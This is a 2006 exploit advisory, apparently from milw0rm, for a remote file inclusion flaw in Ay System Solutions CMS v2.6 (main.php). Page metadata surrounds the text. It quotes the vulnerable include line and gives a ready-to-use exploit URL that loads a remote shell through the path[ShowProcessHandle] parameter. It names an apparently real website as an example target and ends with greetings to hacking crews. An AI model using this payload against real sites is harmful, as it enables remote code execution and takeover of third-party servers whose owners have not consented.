38 lines
No EOL
1.3 KiB
Text
38 lines
No EOL
1.3 KiB
Text
#==============================================================================================
|
|
#Ay System Solutions CMS <= v2.6 (main.php) Remote File Inclusion Exploit
|
|
#===============================================================================================
|
|
#
|
|
#Critical Level : Dangerous
|
|
#
|
|
#Venedor site : http://www.aysad.net/
|
|
#
|
|
#Version : 2.6
|
|
#
|
|
#================================================================================================
|
|
#Bug in : manage/template/standard/main.php
|
|
#
|
|
#Vlu Code :
|
|
#--------------------------------
|
|
# <?
|
|
# include($path["ShowProcessHandle"]);
|
|
# ?>
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/manage/template/standard/main.php?path[ShowProcessHandle]=http://SHELLURL.COM?
|
|
#
|
|
#Example : http://site.turkradyosu.com
|
|
#
|
|
#
|
|
#================================================================================================
|
|
#Discoverd By : SHiKaA
|
|
#
|
|
#Conatact : SHiKaA-[at]hotmail.com
|
|
#
|
|
#GreetZ : Str0ke KACPER XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
|
|
==================================================================================================
|
|
|
|
# milw0rm.com [2006-08-27] |